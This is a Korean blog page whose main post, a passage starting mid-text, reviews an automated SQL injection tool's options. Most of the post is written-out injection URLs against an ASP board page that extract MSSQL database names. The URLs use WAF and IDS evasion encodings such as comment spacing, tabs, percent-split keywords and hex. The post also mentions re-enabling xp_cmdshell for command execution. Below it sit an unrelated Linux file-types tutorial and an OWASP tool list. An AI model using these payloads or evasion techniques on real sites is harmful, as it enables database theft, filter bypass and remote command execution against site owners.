기본적으로 날리는 쿼리는 동일합니다. 다만 SQL Injection할 쿼리를 어떤 형태로 보내느냐하는 차이점만 있습니다.
하나씩 옵션별로 나타나는 특징들만 살펴보도록 하겠습니다.

Replace space as /**/

공백문자열을 /**/ 으로 대체합니다. IDS 패턴 우회기법에서 종종 사용하는 기법입니다.

/board_view.asp?num=16/**/and/**/(select/**/top/**/1/**/cast([name]/**/as/**/nvarchar(500))%2bchar(94)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/[dbid]/**/in/**/(select/**/top/**/1/**/[dbid]/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/[dbid]/**/desc))%3E0--

위와 같은 방법으로 /**/을 넣게 되면 IDS에서 탐지됩니다. -_-;;
문자열로 탐지하는 IDS를 우회기법은 예를 들어 select를 탐지한다면 se/**/le/**/ct 같은 방식으로 쿼리를 날려야 우회가 가능한데 이 옵션은 그냥 공백만 /**/으로 대체했기 때문에 IDS에서 탐지될 확률이 아주 높습니다.

Replace space as +

/board_view.asp?num=16+and+(select+top+1+cast([name]+as+nvarchar(500))%2bchar(94)+from+[master].[dbo].[sysdatabases]+where+[dbid]+in+(select+top+1+[dbid]+from+[master].[dbo].[sysdatabases]+order+by+[dbid]+desc))%3E0--

Replace space as %09

/board_view.asp?num=16%09and%09(select%09top%091%09cast([name]%09as%09nvarchar(500))%2bchar(94)%09from%09[master].[dbo].[sysdatabases]%09where%09[dbid]%09in%09(select%09top%091%09[dbid]%09from%09[master].[dbo].[sysdatabases]%09order%09by%09[dbid]%09desc))%3E0--

Replace space as [TAB]

/board_view.asp?num=16%09and%09(select%09top%091%09cast([name]%09as%09nvarchar(500))%2bchar(94)%09from%09[master].[dbo].[sysdatabases]%09where%09[dbid]%09in%09(select%09top%091%09[dbid]%09from%09[master].[dbo].[sysdatabases]%09order%09by%09[dbid]%09desc))%3E0--

%09가 Character형으로 TAB을 의미하기 때문에 %09 옵션이나 [TAB] 옵션이나 동일한 쿼리를 날리고 있습니다.

Bypass firewall filter when 'select' is not allow

select라는 문자열이 허용되지 않을 경우 이를 우회하는 옵션입니다.

/board_view.asp?num=16%20and%20(se%l%e%c%t%20top%201%20cast([name]%20as%20nvarchar(500))%2bchar(94)%20from%20[master].[dbo].[sysdatabases]%20where%20[dbid]%20in%20(se%l%e%c%t%20top%201%20[dbid]%20from%20[master].[dbo].[sysdatabases]%20order%20by%20[dbid]%20desc))%3E0--

select를 se%l%e%c%t로 변경시켜 쿼리를 날립니다. %만 있는 경우 웹서버를 이를 무시하기 때문에 결국 select라는 문자열만 인식하게 됩니다. HTTP를 통해 들어오는 패킷을 그대로 확인하는 IDS나 WAF라면 탐지를 못하겠지만 이를 웹서버에서 인식하는 형태로 디코딩해서 탐지하는 장비라면 이 옵션 또한 무용지물이 되겠죠.

URI Encode Mode

/board_view.asp?num=%31%36%20%61%6e%64%20%28%73%65%6c%65%63%74%20%74%6f%70%20%31%20%63%61%73%74%28%5b%6e%61%6d%65%5d%20%61%73%20%6e%76%61%72%63%68%61%72%28%35%30%30%29%29%2b%63%68%61%72%28%39%34%29%20%66%72%6f%6d%20%5b%6d%61%73%74%65%72%5d%2e%5b%64%62%6f%5d%2e%5b%73%79%73%64%61%74%61%62%61%73%65%73%5d%20%77%68%65%72%65%20%5b%64%62%69%64%5d%20%69%6e%20%28%73%65%6c%65%63%74%20%74%6f%70%20%31%20%5b%64%62%69%64%5d%20%66%72%6f%6d%20%5b%6d%61%73%74%65%72%5d%2e%5b%64%62%6f%5d%2e%5b%73%79%73%64%61%74%61%62%61%73%65%73%5d%20%6f%72%64%65%72%20%62%79%20%5b%64%62%69%64%5d%20%64%65%73%63%29%29%3E%30%2d%2d

모든 문자열을 헥사값으로 바꿔서 쿼리를 날립니다. 뭐 결국 디코딩하면 위에서 보셨던 쿼리랑 동일한 쿼리가 나오겠지만요..

Enable BT Model (bypass firewall)

언어를 한글로 바꾸면 "변태모드"라고 나옵니다. -_-;;

/board_view.asp?num=16%20an%d%20(se%l%e%c%t%20to%p%201%20ca%st([name]%20as%20nvarch%ar(500))%2bch%ar(94)%20fr%om%20[master].[dbo].[sysdatabases]%20wh%ere%20[dbid]%20in%20(se%l%e%c%t%20to%p%201%20[dbid]%20fr%om%20[master].[dbo].[sysdatabases]%20order%20by%20[dbid]%20desc))%3E0--

중간중간에 %를 마구잡이로 집어 넣어서 쿼리를 날립니다. 그래서 변태모드인가 봅니다.

Stop after error happens(access data)

/board_view.asp?num=16%20and%20(select%20top%201%20cast([name]%20as%20nvarchar(500))%2bchar(94)%20from%20[master].[dbo].[sysdatabases]%20where%20[dbid]%20in%20(select%20top%201%20[dbid]%20from%20[master].[dbo].[sysdatabases]%20order%20by%20[dbid]%20desc))%3E0--

기본 옵션인 Auto-analyzing keyword와 동일하게 공백을 %20으로 만들어서 보냅니다. 옵션 이름으로 해석하면 데이터 접근시 에러가 발생하면 멈추라는 옵션인 듯 한데 어떤 에러에서 멈추라는 의미인지 확인을 못했습니다. 제가 테스트한 서버에서는 계속 타입 불일치로 500 에러를 내면서 계속 결과를 받아왔습니다. 이 결과로 보아 원하는 값을 계속 가져올 수 없는 에러가 발생할 때 멈추라는 것으로 생각할 수 있겠습니다.

Auto check record count of tables

/board_view.asp?num=16%20and%20(select%20top%201%20cast([name]%20as%20nvarchar(500))%2bchar(94)%20from%20[master].[dbo].[sysdatabases]%20where%20[dbid]%20in%20(select%20top%201%20[dbid]%20from%20[master].[dbo].[sysdatabases]%20order%20by%20[dbid]%20desc))%3E0--

다른 기능들은 그냥 한번 써보시면 어떤 기능인지 대충 감은 잡히실겁니다.
좀 더 자세하게 보고 싶었지만 귀찮아서 여기서 끝낼까 합니다...(별로 한것도 없는데 여기서 끝내냐!!! -_-;;)

한가지 달라졌던건 MSSQL2005에서 xp_cmdshell을 이용해서 명령어를 실행하는 부분이었습니다.
MSSQL2005에서는 xp_cmdshell이 기본적으로 막혀 있기 때문에 다시 활성화시켜야 합니다. 그런데 2.x 버전에서는 DB Type이 MSSQL2005 with Error인 경우 활성화를 시켜도 잘 실행이 되지 않았습니다.

Pro 3.0에서는 Restore xp_cmdshell 옵션이 잘 먹혀서 명령어 실행하는데 문제가 없었습니다.
단, 여전히 이상한건 결과가 한번이 아니라 5번 정도 나온다는것이었습니다.
왜 그런지는 아직 확실히 파악을 못했습니다. -_-

다른 더 많은 기능들에 대한 분석은 나중에 시간내서 차분히 해봐야겠습니다.

'web > injection' 카테고리의 다른 글

쉽게쓴 sql injection (0)	2010.11.13
SQL Injection 정리 (0)	2010.01.27

:

Linux 파일의 종류-

system/linux 2010. 1. 6. 22:47

◎Linux에서는 모든 것이 파일 단위로 구성되며 계층적 구조를 형성하고 파일이름, I-node,데이터 블록의 세가지 요소를 갖고있다.

-파일이름 : 사용자가 파일을 접근하고 조작하는데 사용

-I-node : 파일을 기술하는 디스크 상의 데이터 구조. 파일에 대한 정보를 기록하기 위해 사용

I-node는 각각의 파티션 마다 0부터 시작하는 정수의 형태를 가지고 있으므로 서로 다른 파티션이라도 같은 I-node를 가질수 있음.

*I-node에 저장된 정보 : 파일의 소유자(사용자,그룹), 파일의 액세스 모드, 파일의 타임스탬프(파일의 마지막 수정, 액세스), 파일의 종류.

*I-node확인

#ls -il

-데이터 블록 : 실제 파일 데이터 영역

-일반 파일 : 파일의 종류에 대해 확인 가능

#ls -lF
-rw-r--r-- 1 root root 1301 7월 18 16:55 anaconda-ks.cfg

-디렉토리 파일 : 특수 파일로 서로 연관되어 있는 파일들을 하나의 그룹으로 만들어 저장하도록 구분되어 있는 공간을 의미. 디렉토리에는 최소 2개의 I-node번호를 포함함 -> 현재디렉토리를 의미하는 . 과 상위 디렉토리를 의미하는 .. 의 I-node번호 존재.

-링크 파일

*심볼릭 링크 =소프트 링크 : 윈도우의 바로가기 아이콘과 비슷. 다른 파일로의 경로를 가리키는 파일이므로 심볼릭 링크 파일이 삭제가 되어도 실제 원본 파일에는 영향을 주지 않음.

서로 다른 파일 시스템 내에서도 링크가 가능

명령어 위치(/bin/ln)

#ln -s [원본파일] [심볼릭링크 파일]

ex)

#ls -il /dir1/file1

1268199 lrwxrwxrwx 1 root root 11 9월 21 13:26 dir1/file1 -> /root.file1

// /root/file1을 /root/dir1/file1으로 심볼릭 링크를 만든후 확인

-하드 링크 : 원본 파일을 복사한 다음 사본을 만듬. 동일한 I-node를 갖는 파일을 생성하는 것.

명령어 위치(/bin/ln)

#ln [원본파일] [하드링크파일]

ex)

#ls -il dir1/file1

1268195 -rw-r--r-- 2 root root 0 9월 20 00:28 dir1/file1

#ls -il file1

1268195 -rw-r--r-- 2 root root 0 9월 20 00:28 file1

-디바이스 파일 : 하드웨어나 주변 기기들 나타내는 파일 ex)하드디스크, 플로피 디스크, 프린터, 마으스 등..

*블록 디바이스 파일(Block Device File) : 입,출력시에 커널 내의 특정 버퍼들을 이용. 한번에 크기가 큰 블록 단위로 데이터를 입출력.

블록 디바이스 파일을 사용하는 Device : 하드디스크, 플로피 디스크, 데이프 드리아버, 광자기 드라이브

#ls -l
brw-rw---- 1 root root ~~~~~~~~~~~

*캐릭터 디바이스 파일(Character Device File) : 시스템의 I/O 버퍼를 사용하지 않고 바이트 단위로 데이터를 입출력함.

캐릭터 디바이스 파일을 사용하는 Device: 터미널, 프린터, 플로터

#ls -l

crw-rw---- 1 root root ~~~~~~~~~~~~~~~

'system > linux' 카테고리의 다른 글

리눅스보안 - 필수 보안 (0)	2010.07.21
리눅스 기본 명령어 (0)	2010.06.29
rz // sz (0)	2010.06.29
linux file system (0)	2010.01.31
리눅스 명령어 총집합 (0)	2010.01.27

:

tistory start -

cl is - 2009. 12. 31. 15:40

- by cl

'cl is -' 카테고리의 다른 글

travel info (0)	2016.01.12

:

'분류 전체보기'에 해당되는 글 168건

Phoenix/Tools From OWASP

LiveCDs

Test sites / testing grounds

HTTP proxying / editing

RSnake's XSS cheat sheet based-tools, webapp fuzzing, and encoding tools

HTTP general testing / fingerprinting

Browser-based HTTP tampering / editing / replaying

Cookie editing / poisoning

Ajax and XHR scanning

RSS extensions and caching

SQL injection scanning

Web application security malware, backdoors, and evil code

Web application services that aid in web application security assessment

Browser-based security fuzzing / checking

PHP static analysis and file inclusion scanning

Web Application Firewall (WAF) and Intrusion Detection (APIDS) rules and resources

Web services enumeration / scanning / fuzzing

Web application non-specific static source-code analysis

Static analysis for C/C++ (CGI, ISAPI, etc) in web applications

Java static analysis, security frameworks, and web application security tools

Microsoft .NET static analysis and security framework tools, mostly for ASP.NET and ASP.NET AJAX, but also C# and VB.NET

Threat modeling

Add-ons for Firefox that help with general web application security

Add-ons for Firefox that help with Javascript and Ajax web application security

Bookmarklets that aid in web application security

SSL certificate checking / scanning

Honeyclients, Web Application, and Web Proxy honeypots

Blackhat SEO and maybe some whitehat SEO

Footprinting for web application security

Database security assessment

Browser Defenses

Browser Privacy

Application and protocol fuzzing (random instead of targeted)

'security' 카테고리의 다른 글

Test sites / testing grounds

'security' 카테고리의 다른 글

http://ha.ckers.org/blog/20090406/hacking-without-all-the-jailtime/

'security' 카테고리의 다른 글

'web > injection' 카테고리의 다른 글

'system > linux' 카테고리의 다른 글

'cl is -' 카테고리의 다른 글

티스토리툴바